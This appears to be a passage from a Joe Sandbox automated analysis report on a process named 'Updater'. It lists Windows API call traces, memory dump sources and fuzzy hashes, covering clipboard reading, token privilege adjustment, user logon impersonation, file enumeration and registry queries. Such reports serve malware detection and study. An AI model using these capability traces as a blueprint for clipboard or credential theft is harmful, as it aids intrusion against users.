                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                    • Opcode ID: 399b7d36451a83f1aefd7ae95232fc3fa85b959f8dfd4aefae62d5f357b85933
                                                                                                                                                    • Instruction ID: 2c895ee7575f00b4730124763bf5b8db2db6c623b549d7605becbb0f7c6356e4
                                                                                                                                                    • Opcode Fuzzy Hash: 399b7d36451a83f1aefd7ae95232fc3fa85b959f8dfd4aefae62d5f357b85933
                                                                                                                                                    • Instruction Fuzzy Hash: C3D06C3200010DBBDF028F84DD06EDA3BAAFB48714F014100BE1866020C776E821AB90
                                                                                                                                                    APIs
                                                                                                                                                    • CreateDirectoryA.KERNEL32(00000000,00000000,?,01406D3A,00000000,0140913F,014092E5,?,c:\,014092E5,?,c:\), ref: 013F5452
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227830347.00000000013EB000.00000040.00000020.00020000.00000000.sdmp, Offset: 013EB000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_13eb000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateDirectory
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4241100979-0
                                                                                                                                                    • Opcode ID: 2afb928ea0769a03e65cdb2334b4541331df32d5787a6e4dcd60dacd8e68de1d
                                                                                                                                                    • Instruction ID: 37719a497d4d11c5f99a50642e96aef78c37ddbceef4e9cfc8ab298971a6b835
                                                                                                                                                    • Opcode Fuzzy Hash: 2afb928ea0769a03e65cdb2334b4541331df32d5787a6e4dcd60dacd8e68de1d
                                                                                                                                                    • Instruction Fuzzy Hash: 16B092927502419AEA0035BC1CC1F2A008CE72480AF100879F202D6542E56AC8080020
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00B31EE8: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,?,?,00B2C025,?,00008000), ref: 00B31F16
                                                                                                                                                    • GetLastError.KERNEL32(00000002,00000000), ref: 00B98195
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateErrorFileLast
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1214770103-0
                                                                                                                                                    • Opcode ID: f119513cad27b36b32c8fe34c8c35ab18bacfea69501214a52b3e3fb4a2b29a8
                                                                                                                                                    • Instruction ID: 612960bfe0218d483d778d20803e2e85405815657cc76bc2bdff272ae82931c9
                                                                                                                                                    • Opcode Fuzzy Hash: f119513cad27b36b32c8fe34c8c35ab18bacfea69501214a52b3e3fb4a2b29a8
                                                                                                                                                    • Instruction Fuzzy Hash: 9C919E302043119FCB14EF28D491B6AB7E1EF89710F0449ADF99A5B2A2DF34ED49CB56
                                                                                                                                                    APIs
                                                                                                                                                    • VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 013EEEE2
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227830347.00000000013EB000.00000040.00000020.00020000.00000000.sdmp, Offset: 013EB000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_13eb000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                                    • Opcode ID: e87a6391b5a567c042f06bb06dd2041547d4497a5e35fe8e29fe9b093c0e9a99
                                                                                                                                                    • Instruction ID: b268e17e9fbefafaac1ceff79dadd1a1bc632c5488e10f601142b6fe284be19f
                                                                                                                                                    • Opcode Fuzzy Hash: e87a6391b5a567c042f06bb06dd2041547d4497a5e35fe8e29fe9b093c0e9a99
                                                                                                                                                    • Instruction Fuzzy Hash: 5A21FCB4204356DFC760CF2CC884A5ABBE0FF88354B148969F999CB384E330E944CB92
                                                                                                                                                    APIs
                                                                                                                                                    • VirtualFree.KERNEL32(?,?,00004000), ref: 013EEF99
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227830347.00000000013EB000.00000040.00000020.00020000.00000000.sdmp, Offset: 013EB000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_13eb000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FreeVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1263568516-0
                                                                                                                                                    • Opcode ID: 96274f65c4a527f4e37b87508b40ab3519f41951c2593a7b05e565cb7d8d1ec1
                                                                                                                                                    • Instruction ID: fdc28c3305c88b98436ad7c9dae530d657d25f81a97dc8a79a6488d04d6c1c82
                                                                                                                                                    • Opcode Fuzzy Hash: 96274f65c4a527f4e37b87508b40ab3519f41951c2593a7b05e565cb7d8d1ec1
                                                                                                                                                    • Instruction Fuzzy Hash: E421DDB4205312CFC711CF2CD884A1ABBE0FF89354B254968E598DB394D330E919CB92
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227830347.0000000001410000.00000040.00000020.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_1410000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: daf07dfe0449386a21cd617d80c280d79caee84e403b1fdd0f7a77803a7c3103
                                                                                                                                                    • Instruction ID: b9b7e0ac57903aa09441c377eb4a7de827390e0d70b3229a9234fb1a592af173
                                                                                                                                                    • Opcode Fuzzy Hash: daf07dfe0449386a21cd617d80c280d79caee84e403b1fdd0f7a77803a7c3103
                                                                                                                                                    • Instruction Fuzzy Hash: 09313931504A02EAEB214AAEDC40BE77B58BF87324F08072BED619F6E5D730D565C7A1
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00BB5969
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                    • String ID: %d/%02d/%02d
                                                                                                                                                    • API String ID: 3850602802-328681919
                                                                                                                                                    • Opcode ID: fcb128c0c30b07565fabc2415449265a2ea6d4012c95dbcd15fd071356735bbc
                                                                                                                                                    • Instruction ID: beead6ac23ffd41286874ca498a6b429069d7550ba315b28d534c7cee017d07b
                                                                                                                                                    • Opcode Fuzzy Hash: fcb128c0c30b07565fabc2415449265a2ea6d4012c95dbcd15fd071356735bbc
                                                                                                                                                    • Instruction Fuzzy Hash: 4412CE71600614ABEB358F29CC49BFE7BF8EF45710F10429AF95A9B2D0EBB49941CB11
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00B827D9: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B82823
                                                                                                                                                      • Part of subcall function 00B827D9: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B82850
                                                                                                                                                      • Part of subcall function 00B827D9: GetLastError.KERNEL32 ref: 00B82860
                                                                                                                                                    • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00B82394
                                                                                                                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00B823B6
                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00B823C7
                                                                                                                                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00B823DF
                                                                                                                                                    • GetProcessWindowStation.USER32 ref: 00B823F8
                                                                                                                                                    • SetProcessWindowStation.USER32(00000000), ref: 00B82402
                                                                                                                                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00B8241E
                                                                                                                                                      • Part of subcall function 00B821C9: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00B82308), ref: 00B821DE
                                                                                                                                                      • Part of subcall function 00B821C9: CloseHandle.KERNEL32(?,?,00B82308), ref: 00B821F3
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                                                                                    • String ID: $default$winsta0
                                                                                                                                                    • API String ID: 22674027-1027155976
                                                                                                                                                    • Opcode ID: 0d931b0d0c2db61b57938b001b76fff05b4dc35d297bac61d97c2501b7e043f8
                                                                                                                                                    • Instruction ID: 081f0e5f3cf8c6eee72ed25e80087b3e996d3a7517a859b0ac48717008ef9ebd
                                                                                                                                                    • Opcode Fuzzy Hash: 0d931b0d0c2db61b57938b001b76fff05b4dc35d297bac61d97c2501b7e043f8
                                                                                                                                                    • Instruction Fuzzy Hash: 16818CB1940209AFDF11AFA4DD49FEE7BF8EF08300F1441A9F915A62A0DB75CA45CB60
                                                                                                                                                    APIs
                                                                                                                                                    • OpenClipboard.USER32 ref: 00B9F68E
                                                                                                                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 00B9F69C
                                                                                                                                                    • GetClipboardData.USER32(0000000D), ref: 00B9F6A8
                                                                                                                                                    • CloseClipboard.USER32 ref: 00B9F6B4
                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00B9F6EC
                                                                                                                                                    • CloseClipboard.USER32 ref: 00B9F6F6
                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00B9F721
                                                                                                                                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 00B9F72E
                                                                                                                                                    • GetClipboardData.USER32(00000001), ref: 00B9F736
                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00B9F747
                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00B9F787
                                                                                                                                                    • IsClipboardFormatAvailable.USER32(0000000F), ref: 00B9F79D
                                                                                                                                                    • GetClipboardData.USER32(0000000F), ref: 00B9F7A9
                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00B9F7BA
                                                                                                                                                    • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00B9F7DC
                                                                                                                                                    • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00B9F7F9
                                                                                                                                                    • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00B9F837
                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00B9F858
                                                                                                                                                    • CountClipboardFormats.USER32 ref: 00B9F879
                                                                                                                                                    • CloseClipboard.USER32 ref: 00B9F8C2
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 420908878-0
                                                                                                                                                    • Opcode ID: 880de3792e09093b7297881da139372601f1832c84a7fe4f66b2bd178536e5ce
                                                                                                                                                    • Instruction ID: dc8484ed20c0aabf2314faea342d593c72a79566352eea2d0b02872fec9c07a1
                                                                                                                                                    • Opcode Fuzzy Hash: 880de3792e09093b7297881da139372601f1832c84a7fe4f66b2bd178536e5ce
                                                                                                                                                    • Instruction Fuzzy Hash: 71618A352043029FD710EF24E888A7A7BE4EF84724F1449B9F45AC72A2EB75DD45CB62
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: $!$"$'$+$0$9$:$<$DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$]${
                                                                                                                                                    • API String ID: 0-2815329305
                                                                                                                                                    • Opcode ID: fa31f72f179805cea17f6adfbf8119512b155f3bfdb7cbe0c9196be9e38a114a
                                                                                                                                                    • Instruction ID: 3f1331b35bd419cbd240ebd7680110cd6168d40e4a043c2615b461c3386fe830
                                                                                                                                                    • Opcode Fuzzy Hash: fa31f72f179805cea17f6adfbf8119512b155f3bfdb7cbe0c9196be9e38a114a
                                                                                                                                                    • Instruction Fuzzy Hash: 95A38075A00219DFDB24CF58D891BADB7F1FF48710F2581AAE969AB381E7709D81CB40
                                                                                                                                                    APIs
                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00B9A1A8
                                                                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 00B9A1E6
                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,?), ref: 00B9A200
                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00B9A218
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00B9A223
                                                                                                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00B9A23F
                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00B9A28F
                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(00BE79A0), ref: 00B9A2AD
                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00B9A2B7
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00B9A2C4
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00B9A2D6
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                    • String ID: *.*
                                                                                                                                                    • API String ID: 1409584000-438819550
                                                                                                                                                    • Opcode ID: 7e526d54af9b7ea884a83c1728a060b9ae112718a7f6d8a72c12ef6442335c4e
                                                                                                                                                    • Instruction ID: 6051a4e47bb1f2af7178d1dc381338a313a967474026021d3dfc68916fb874f3
                                                                                                                                                    • Opcode Fuzzy Hash: 7e526d54af9b7ea884a83c1728a060b9ae112718a7f6d8a72c12ef6442335c4e
                                                                                                                                                    • Instruction Fuzzy Hash: 9431E0326002597FDF24AFA4EC49AEE77ECDF05320F1002E5E814E30A1FB75DA448AA5
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                                                                                                                    • API String ID: 0-4052911093
                                                                                                                                                    • Opcode ID: f28b0aecd8a3a14e2abba60b4126e460f05f0045e01082dad4bfc9299d007da4
                                                                                                                                                    • Instruction ID: 3a3a02d10c73c7bf2c4aedc312ab178f6e6bb749f313b516e4cfa2240a90a06e
                                                                                                                                                    • Opcode Fuzzy Hash: f28b0aecd8a3a14e2abba60b4126e460f05f0045e01082dad4bfc9299d007da4
                                                                                                                                                    • Instruction Fuzzy Hash: A3728171E002199BDB54CF59C8917AEB7F5EF84310F2481EAE819FB281EB709D85CB91
                                                                                                                                                    APIs
                                                                                                                                                    • GetLocalTime.KERNEL32(?), ref: 00B98D1A
                                                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B98D2A
                                                                                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00B98D36
                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00B98DD3
                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00B98DE7
                                                                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 00B98DF2
                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00B98E20
                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00B98E56
                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00B98E5F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CurrentDirectoryTime$File$Local$AttributesSystem
                                                                                                                                                    • String ID: *.*
                                                                                                                                                    • API String ID: 2554310696-438819550
                                                                                                                                                    • Opcode ID: 0c253cbb243bb752853848909242808e29091954dcc7ad1f4d70db68a211c34a
                                                                                                                                                    • Instruction ID: fccdcf20ee632c3e5128bc21ce13979b043d13cfa8cb5ce3cf59266d2f13e2a5
                                                                                                                                                    • Opcode Fuzzy Hash: 0c253cbb243bb752853848909242808e29091954dcc7ad1f4d70db68a211c34a
                                                                                                                                                    • Instruction Fuzzy Hash: 57617D715042559FCB10EF20C8849AFB3E8FF89710F0449ADF989C7251EB35EA45CB62
                                                                                                                                                    APIs
                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00B9A305
                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00B9A360
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00B9A36B
                                                                                                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00B9A387
                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00B9A3D7
                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(00BE79A0), ref: 00B9A3F5
                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00B9A3FF
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00B9A40C
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00B9A41E
                                                                                                                                                      • Part of subcall function 00B8E8E1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00B8E8FC
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                                    • String ID: *.*
                                                                                                                                                    • API String ID: 2640511053-438819550
                                                                                                                                                    • Opcode ID: 872c08b9d200880d329ad39f8466f7058fee8226dce552e795156708d443dbdf
                                                                                                                                                    • Instruction ID: 74abe440597308ba72c94bb2010685dab69f0238ac4e5bc7194ec684ddab86ec
                                                                                                                                                    • Opcode Fuzzy Hash: 872c08b9d200880d329ad39f8466f7058fee8226dce552e795156708d443dbdf
                                                                                                                                                    • Instruction Fuzzy Hash: 4B31033250465D7BDF20AFA4EC49ADE77ECDF05320F1001F5E814A32A1EBB4DE859A99
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00BAD398: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BAC0AE,?,?), ref: 00BAD3B5
                                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BAC93E
                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 00BAC9A9
                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00BAC9CD
                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00BACA2C
                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00BACAE7
                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00BACB54
                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00BACBE9
                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 00BACC3A
                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00BACCE3
                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00BACD82
                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00BACD8F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
